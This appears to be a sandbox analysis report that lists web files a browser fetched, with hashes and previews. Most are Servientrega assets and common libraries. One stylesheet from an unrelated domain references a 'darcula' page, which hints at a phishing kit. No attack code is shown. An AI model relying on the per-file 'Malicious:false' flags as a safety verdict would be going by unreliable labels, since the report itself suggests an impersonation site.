            SHA-512:229F23E01F69E27B89F9989D8120DEC351068D47B42BDBEBC7C88EEFFC8C0703FCB0345EE618278BDF626D14720B476CE5DC1B502ED8BE30940D8BFD2E3825C3
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/imagen-home-2024.webp
            Preview:RIFF....WEBPVP8X........W..S..VP8L..../W...@.d+l3w...C...RRBD.'....s?.:..=.wbk.@............T..d.....tM..=%zW...........wtm`.....q.Y9....z....zF....@..qx......H......8.3..1.C-.d...UU.....F...H.MBI.....<.......9...6...T..A..JL{.{O;....@..$<.W.i...X.i..T..4m....J......8...p..:.mI...$.L..&04$$..... ..-..q.j..^&....2..\..>... ..t..@...2.@...I.*.......?$..C..I.|3T`@6.(..{.I...M.<.r..f.N@.......:.....pt.xoc...i.y.....5.U/...I...5.Q5...Hz..5~.......I..aQ........+..&...e`."...'3.e...j;....<l.%Y........m.....m.j.i.W33..3...0..0.J.......pR.(.....EQ.c..{..D$*..H$.v..........6E.]..c..3.(..!.;.....H...G7.h.}3.m...Jh..I....Y.g..j#.6:@o...^. ..Q.....WX*...9.D..Z.:=.[..]..7r.._8...Q.`)"MHD..Ghou..:.,.w2.l..\.P.(.>.y9..xnT.T.\+"Y(..jNo...[.../...5.Z.W...e.&M.....?..k.I...Eh.=......Q..uW.-;.R..DHW...{...|........k..o.;=...4-Sc..8'.MQLR..s.1"$..9.8JdW.`...=......P..d6..|....0^......@...e..(..k-...(...%...L#_3E..H...L.aO..y.CoZ.Nf{T..(.. JH..x.......
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65500)
            Category:downloaded
            Size (bytes):97202
            Entropy (8bit):5.088196928908395
            Encrypted:false
            SSDEEP:1536:svjRbKmkbsmPD01puFaYdmdqx63/Je1apL/D:CjRbKm2mdM6xF
            MD5:3909C770A3056B51EEB0343BFFB502A3
            SHA1:2826CB23947B16B51D1E5911926505FAB95D803D
            SHA-256:79FD288D5BC7299676E2D49DE2E23E7CFB76AFB0330C50AA0DA086CE44C7B104
            SHA-512:AB809C331BF9E3232C2F7E56ED023D5558BFD3EBC08DBFD23FC23C7F49099964D37CC6D23E9F10D2C8EF1D4DB365F7373B4EC47F0734DBB50484C2C7F58ACFFE
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/assets/css/app.css
            Preview:@import url("../css/plug.min.css");.html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,sub,sup,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,caption,article,aside,canvas,details,figcaption,figure,footer,header,hgroup,menu,nav,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;outline:0;font-size:100%;vertical-align:baseline;background:transparent}body{}*{outline:none}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}nav ul{list-style:none}li{list-style:none}blockquote,q{quotes:none}blockquote:before,blockquote:after,q:before,q:after{content:'';content:none}a{margin:0;padding:0;font-size:100%;vertical-align:baseline;background:transparent;text-decoration:none}ins{background-color:#ff9;color:#000;text-decoration:none}mark{background-color:#ff9;color:#000;font-style:italic;font-weight:bold}del{text-decoration:line-through}abbr[title],dfn[title]
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (3184)
            Category:downloaded
            Size (bytes):3351
            Entropy (8bit):4.914211238199009
            Encrypted:false
            SSDEEP:48:uZo8LL+IJWmQq+v+dDKopvu+ztL+F/+wI+weAzT+RV+VAPsAvqeghOHHy3VzoRvO:JgA6eA2+AbdEK7pcXVxZaIJICNMM
            MD5:B2752A850D44F50036628EEAEF3BFCFA
            SHA1:FBA46353CF90450EF3D362A123F1E7AF3E8C561E
            SHA-256:521410E1FC44780061E09ADC980275FB5EA277FD5D9E538454214EC4379FF4BC
            SHA-512:B52DD2E6A1B40658674113B2257BCD8DE10CE14A4C5C7AD07D31A66D0D602A67A50B195210151AC614418FF1054F3A5B3F84554ABA448A46E6749A1B0AF844DE
            Malicious:false
            Reputation:low
            URL:https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css
            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */..owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-ca
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x884, components 3
            Category:downloaded
            Size (bytes):31358
            Entropy (8bit):4.559246866023873
            Encrypted:false
            SSDEEP:384:hffffffffffHTVIv+bTpfAFGchWsvt5OWdRZ6P1b1SJuY7lD9IbGi3wutfhWm1:LbZA4chBvtDr8P1qJDutz1
            MD5:CE6BF1E1AF646B49F338AB70881CC4F0
            SHA1:0FE95A7BDA359DCB78F0F2A8B86980A936109A05
            SHA-256:F295AAE35DE2DDAFE164E6F328284ED9E09C8B883EE516E44266BD2123653CB0
            SHA-512:B4AFF190A37E275D272232CF79C4A83502A6980BE3703D9D45277E4E955DA6927ED31F264F2EBC13368E8C0E739DC6F22DDD5EFD036027F431CD6896CE66E098
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/uzer-heading-bg-2024.jpg
            Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.9 (Windows)" xmpMM:InstanceID="xmp.iid:FC7AA0BA4EB211EFB723AD9497B95389" xmpMM:DocumentID="xmp.did:FC7AA0BB4EB211EFB723AD9497B95389"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FC7AA0B84EB211EFB723AD9497B95389" stRef:documentID="xmp.did:FC7AA0B94EB211EFB723AD9497B95389"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1101
            Entropy (8bit):4.851720620025946
            Encrypted:false
            SSDEEP:12:TMHd4lniOaYxJNTb/lR2kvJ/D4n3rTMwMlLSA3A37bLVYyV+qwuqpJFIFMoW5mqL:2dUnjTxJNJRwTMwtF+3ueua5mq928DY2
            MD5:B986C13F9976E2CE0FCBB3C0F54DBA5B
            SHA1:E95575D872662C3A2C9474A4CCDABA59F27CD755
            SHA-256:9D6418C154873B4D8B682F6ED4E6CE94EED2099C9DE5CB8F2949C86518ADD60A
            SHA-512:CB32283BADCAA508771186C8946A407FE27EC1DE762CEB5A992C813158D01FE50D8CAD3543D39450535559F9263FE038D9E38864B531ED7855A5102C78553D04
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-lk.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="linkedin">.. <path d="M11.5 0C17.8516 0 23 5.14912 23 11.5C23 17.851 17.8516 23 11.5 23C5.14833 23 0 17.8509 0 11.5C0 5.1492 5.14841 0 11.5 0Z" id="Path" fill="#0E76A8" fill-rule="evenodd" stroke="none" />.. <path d="M0.0115269 10.051L2.16492 10.051L2.16492 2.87351L0.0115269 2.87351L0.0115269 10.051ZM8.40081 2.62489C7.35573 2.62489 6.42063 3.00654 5.75728 3.84895L5.75728 2.8499L3.59599 2.8499L3.59599 10.051L5.75728 10.051L5.75728 6.15686C5.75728 5.33387 6.51127 4.53101 7.45568 4.53101C8.4001 4.53101 8.633 5.33387 8.633 6.13672L8.633 10.0503L10.7864 10.0503L10.7864 5.97645C10.7863 3.14668 9.4466 2.62489 8.40081 2.62489ZM1.07816 2.15624C1.67329 2.15624 2.15632 1.67321 2.15632 1.07808C2.15632 0.482945 1.67329 0 1.07816 0C0.483024 0 0 0.483024 0 1.07816C0 1.67329 0.483024 2.15624 1.07816 2.15
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2828
            Entropy (8bit):4.702208915781906
            Encrypted:false
            SSDEEP:48:cxnxGnsAP/3fUn5XULwkDrtk6UvpUhkzUV2emGcKU8hE:q+/e5XUkkftLMpUhkzUVSGJU8m
            MD5:6F4A7A49589ED8AF694003220991F244
            SHA1:2CBE51B914ED62236DFBF5C4E6D77ED765BE2699
            SHA-256:276101F05F88FC3394CB7515C626053A624413ABC4607AF869E0288AB6E637D5
            SHA-512:339C969ACEB361674FD0B362719021E4197C51B0C461AA4701BEFF9B6B5C6A6F8133CF4216EC9FC6E5F9E4C1219C1559871AF5ECDA32D5627EEF3937013DCF8B
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 29</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-1088.000000, -126.000000)">. <g id="Group-29" transform="translate(1088.000000, 126.000000)">. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3" fill="#009A44">. <path d="M20.1868332,20.1871639 L18.8322719,20.1871639 L18.8322719,3.68059679 C18.8322719,3.45612296 18.6499437,3.27422175 18.4254735,3.27422175 L2.73234361,3.27422175 C2.50787345,3.27422175 2.32597522,3.45612296 2.32597522,3.68059679 L2.32597522,20.1871639 L0.812736767,20.1871639 L0.812736767,0.812750081 L20.1868332,0.812750081 L20.1868332,20.1871639 Z M3.13871199,7.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2343)
            Category:downloaded
            Size (bytes):52916
            Entropy (8bit):5.51283890397623
            Encrypted:false
            SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
            MD5:575B5480531DA4D14E7453E2016FE0BC
            SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
            SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
            SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
            Malicious:false
            Reputation:low
            URL:https://www.google-analytics.com/analytics.js
            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):524759
            Entropy (8bit):7.970282536262908
            Encrypted:false
            SSDEEP:12288:Xrw+tbFzRV2X8xjoDSOS8tJgTZrWpkSWeafbSGjy4o:GMxc+OS8tJgNrWe+EbSAs
            MD5:4D4656D2EA917FDBF919F4A1BAE28DBE
            SHA1:9A9A3F5D69B1AD23F9D1C8079E79978A5B1F37CF
            SHA-256:61A2F20C9DC2A89DBF7626BE9D882A6042FF516417B246A932CAFB46FE84E92A
            SHA-512:2E0C4881089A4531481ECE1D61AC6FA2D5DAE89FA8E4895F646151F632D89842BCFCE6D5C2C5CF43BC92F36539966C8C50E760044481B381871859D77EDE6DB5
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............d.......PLTE.;~..e.C..F......a.B..>...f.6}....3z..i.:../w.#m.*s....'p?#...h..b.!n.!h./u.h...`.v..?..`..G.....O..W.B9L....6y.'m....KO.=K.,q..[. e+)3.DM*..#....v........`....D/%.'j;( ...:!.L6,..z2..1 .....p......WV>3...4v..n./p..rb@0..]D'........c.JDP...v_kH7.pYV7).jU81?.]H.ePO.!.....k.wZvN<..]`G;zWD..._P.&g..Z........{b..t.......Y..../m...oUm".kPB.^.6....f.l.|..+g.XI]......V......|..QB.iP.....g.`I.}d..........n..})!.u]...d[.|a....m.H:(".zu}.?2J.....$..'...2(*'..T?......s...X.....bR.lU......b0&.ke.j.t:/!.......@6...sZL.LB.qa..nd.1..........}........v...9B. Q..2~....[M.ysk.{.e.....'/...sy.S~.[WY...QV.U...Bkff.......BZ...4@....a`....Ai..D~Pc.L}..............XA..Pc......ovrn......V.$/...o].A....}.IE.....@xs.J.k"...&...............tRNS...1.r....IDATx.....0..'.R.G.r.W..{../...2....c.|......>.O|........v....).{k=.X.q...Z...........].....'..Ek....F...M...^t}.Xb.e...._...C...[...~e..*.;..c....h![.{.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (399)
            Category:downloaded
            Size (bytes):400
            Entropy (8bit):4.876227719251662
            Encrypted:false
            SSDEEP:6:UnKqKHN4h2QWu2LzDzSRJMCxkGbRjJIr9IIVQNlMyMMU2JdtTTXRXO0EOrvdVrKS:2XW4h2JT/zSRc9IoQNf++hxFEO5wXCn
            MD5:2B914E8858486EAB2DCFEAA859EA8357
            SHA1:B782507D4E8CEDBA35AAD5CBD1C4778115A1CB12
            SHA-256:F4397CED557E01524D17B5D0988131CBF8B4C9CB5AF39749E74E3671B8EB1917
            SHA-512:1416A0872268429581E96E0A8FACB8757041CF92D74F0C0A7C1897644FBC2C4422329242E6CAB50AC1CAF366CE5D3B2CE085F20BEABB17E0893AA0D3197365CF
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/f4397cedtE5dP.css
            Preview:html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[type=tel],input[inputmode=tel],input[type=email],input[inputmode=email]{direction:ltr!important}div.button-submit button{text-transform:capitalize}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (19157), with no line terminators
            Category:downloaded
            Size (bytes):19157
            Entropy (8bit):4.937770512209066
            Encrypted:false
            SSDEEP:192:6wR+nXh/TVc6jU+4v7fix43obCfCfIlSc:6wRWXhK6jU+4vTixaACaglSc
            MD5:6B7FB2EE130535419A67AFB198F41C2B
            SHA1:FFB8A25633C4DDEAB81D1B1742AC2FD0B442A4C6
            SHA-256:C6956E8710CF477F7014440385AE16EE4B8CC7ECFD02FDDD4D2F0C6C7FD15845
            SHA-512:CB27BFBB47A142CAD5ADF49DE9B893D7BB77F5183D90D73EBC435C09766E333D9AF8B5851AF5D49D8B96516EA96DF623D637016FF0B7F54670D9C890BF00C3BE
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/npm/intl-tel-input@17.0.8/build/css/intlTelInput.min.css
            Preview:.iti{position:relative;display:inline-block}.iti *{box-sizing:border-box;-moz-box-sizing:border-box}.iti__hide{display:none}.iti__v-hide{visibility:hidden}.iti input,.iti input[type=tel],.iti input[type=text]{position:relative;z-index:0;margin-top:0!important;margin-bottom:0!important;padding-right:36px;margin-right:0}.iti__flag-container{position:absolute;top:0;bottom:0;right:0;padding:1px}.iti__selected-flag{z-index:1;position:relative;display:flex;align-items:center;height:100%;padding:0 6px 0 8px}.iti__arrow{margin-left:6px;width:0;height:0;border-left:3px solid transparent;border-right:3px solid transparent;border-top:4px solid #555}.iti__arrow--up{border-top:none;border-bottom:4px solid #555}.iti__country-list{position:absolute;z-index:2;list-style:none;text-align:left;padding:0;margin:0 0 0 -1px;box-shadow:1px 1px 4px rgba(0,0,0,.2);background-color:#fff;border:1px solid #ccc;white-space:nowrap;max-height:200px;overflow-y:scroll;-webkit-overflow-scrolling:touch}.iti__country-lis
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (18589)
            Category:downloaded
            Size (bytes):18654
            Entropy (8bit):5.371055687974937
            Encrypted:false
            SSDEEP:384:lQc2SBgP+hiq7QlMzCVV5jzwc06Bk76u9Mk89B7f:Kc2Mk+7y/fk6uqkm
            MD5:836A3DB3F2B3A883371F39B1E78E62A1
            SHA1:1C4B1B03254CA3A51CEEAFA6EF21CDC381DCAAAD
            SHA-256:E8DC09E4DDC3C326EF6341498E7E8E70AF3A848713429B909BE53C947B43DA10
            SHA-512:B91E3A18EC1151EA458B677371AB4EDEAA6BE289C08F8E950BD96D3C5230697F185E5E4ED7C9D54FF26725963BCAAAEB2943F49E00FF623B9AB6C26A083A58CA
            Malicious:false
            Reputation:low
            URL:https://cdnjs.cloudflare.com/ajax/libs/Sly/1.6.1/sly.min.js
            Preview:/*! sly 1.6.1 - 8th Aug 2015 | https://github.com/darsain/sly */.!function(a,b,c){"use strict";function d(b,p,q){function K(c){var d=0,e=Gb.length;if(yb.old=a.extend({},yb),wb=tb?0:ub[rb.horizontal?"width":"height"](),Bb=zb[rb.horizontal?"width":"height"](),xb=tb?b:vb[rb.horizontal?"outerWidth":"outerHeight"](),Gb.length=0,yb.start=0,yb.end=H(xb-wb,0),Rb){d=Ib.length,Hb=vb.children(rb.itemSelector),Ib.length=0;var f,g=j(vb,rb.horizontal?"paddingLeft":"paddingTop"),h=j(vb,rb.horizontal?"paddingRight":"paddingBottom"),i="border-box"===a(Hb).css("boxSizing"),l="none"!==Hb.css("float"),m=0,n=Hb.length-1;xb=0,Hb.each(function(b,c){var d=a(c),e=c.getBoundingClientRect(),i=G(rb.horizontal?e.width||e.right-e.left:e.height||e.bottom-e.top),k=j(d,rb.horizontal?"marginLeft":"marginTop"),o=j(d,rb.horizontal?"marginRight":"marginBottom"),p=i+k+o,q=!k||!o,r={};r.el=c,r.size=q?i:p,r.half=r.size/2,r.start=xb+(q?k:0),r.center=r.start-G(wb/2-r.size/2),r.end=r.start-wb+r.size,b||(xb+=g),xb+=p,rb.horizont
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):2287
            Entropy (8bit):4.668928453189724
            Encrypted:false
            SSDEEP:48:kMBqaFD5H2ozCNiWuicUiircsiiIuicBii849l9GYJbWHBFM:XWZ59l5BWHBC
            MD5:CEDD8D18743498B5785769502C97A80A
            SHA1:DF08775CFDBD765BC1DA083D78BD35BA242050F8
            SHA-256:470E31154D0AC42631B2566A7FAE07B3892C3064617C7A638CF9B0F0C6D5E21D
            SHA-512:643EC3DA3407173451158F4451FEFD26C8A36AFFEA8B41363B59B634BEED96086CD04B9AEA2AF97BFF16B5E8D96E8A8AE2BCD70B75CCF4F20E33CC22156F8F04
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.su
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 300 x 74, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):7499
            Entropy (8bit):7.962907422048286
            Encrypted:false
            SSDEEP:192:dUXIuhwNU6CLdUnchF09An0W8dleiAUnKhfnVCcRmpZ:cII6CTUS0W82dCc8pZ
            MD5:45B6886EFE79C102E84D0FDB6A6EBA81
            SHA1:03E5EDE7C76ED7718F3005690958FE1859737BA1
            SHA-256:4FF76BCB1EB34A70B2871C43836D3240EBB9ACE5FC258DD9D1697E92F01235A9
            SHA-512:2809451164893B5C3DD7899166AD191E811469E4C2557D6BBE003D6C4B03F4A73EA9757270AEB6222D82F9C0FE0ECA7D5C161445B65A9983298A9FCD86123805
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...,...J.......i.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx.......&g&A.p..'...e`ov..b.XJV.'...4s.8..qn$k..XR,...u...^....=.($R.,..Y`.@l.J.d9X..].f.=...l6............U].:u.SU....`0.....`0........+..aB.....(M..O^=...b7...W..!%...}.ce.......L...lv.&....t..>.b.&.n.%....F`..%\....m.2.L...i...`...IhY,@...8v...~...D..X*........j.R..vq.ty.$^.Zw.t......,....V.:.@...Vb...j.;.R...Y..@.\.X....w...S.eJ..}......U:..J.8vh.!..:.-.j0.....E...)...-...|...:......e.y}.tq.v...^..*._.....zc...W.=R..p$.|..gc..,@.L.....s.....Oe...,j.z%..V.2...../.....@....I...f...rT.*../.. .].UE...u.Z.\...w.Z.O.U.}(..}.4...T..N..LG.\.k.i.B_+.~DyV..B...o....9.+....C/..2....(..`.w.V.gg%L(..G....|....$b....R.Z...CB..aA..~....H]...p.4..*..]y.ZV...~*.^.P.. ..WHT..@..q.}..........q..U.A4.)..L...XN'...P........i.0B.....Q..rV.U&eie..]H.kn$....FU....#...w.4....."b.v.{Q..b..=@+..L.gP.....@.Q...M]X....0._V.<.1.....N....w\/].....A...L...UC..8...W.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):2637
            Entropy (8bit):4.734213644535169
            Encrypted:false
            SSDEEP:48:kMBzaFD5H2ozCNiWuicQcsiiIuic6CVxBiTVOBh49l2GBJbWH0Fpv:+WZzPw+i9lhBWH0rv
            MD5:2C6AEED49CE509A4C2BD13B36BFCADD4
            SHA1:A8C6AB51A1FAD7F349F97ECFFDFCA822EDF983F1
            SHA-256:88DED5B4ADDF9E1F32BD8C5EE3AEB452F81DB3D637618AB7EBD53FDD6E04A6A3
            SHA-512:022B7D3E2B5DD5A3561CC01A86A1342CBA97D75401A30D93C87F1525E6C27D4CFD93581389B557AB17B2CF9CC69DB56E2F270B45516CF42DB8412CD78FEA8BD3
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;..$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):4900
            Entropy (8bit):4.506731891504076
            Encrypted:false
            SSDEEP:96:q1mPpkzqO6VfBSE2k99BmM0R8eFoaykkZGH:Sp3+V2kjBmM0RToHZq
            MD5:07B36F8AB24C62887848A83B92C500B5
            SHA1:99E5A0CB980E1D9690C8A399B4D6592C2F8A32DC
            SHA-256:2E6A5002DABD85D84D3FB481C610E1069562022C19963DAED0F238E11CCA2A33
            SHA-512:9B7208EDF8C3F37745B4DDBC6BC050B0F2AA27E7195A02C754FBAB52AF38CC1C1C2A19A592A26A097F87DCCA8CF568A6D9DFFE8912F242EB185CA3D2C1E80167
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-transporte.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 14</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-146.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-14" transform="translate(60.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-11" transform="translate(0.000000, 12.893769)">. <g id="Group-3" transform="translate(10.500000, 0.000000)" fill="#009A44">. <path d="M30.5531449,14.1506171 L27.8758304,14.1506171 C27.6334276,13.0941357 26.6321555,12.3023561 25.4369611,12.3023561 C24.26
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32038)
            Category:dropped
            Size (bytes):95992
            Entropy (8bit):5.391333957965341
            Encrypted:false
            SSDEEP:1536:OP10iSi65U/dXXeyhzeBuG+HYE0WEeLDFoNqLTW8+S5VRZIVI6xSb8xh2ZbQnRmm:R+41ZqLTW8xRrqSb8qGH77da98Hr3
            MD5:F03E5A3BF534F4A738BC350631FD05BD
            SHA1:37B1DB88B57438F1072A8EBC7559C909C9D3A682
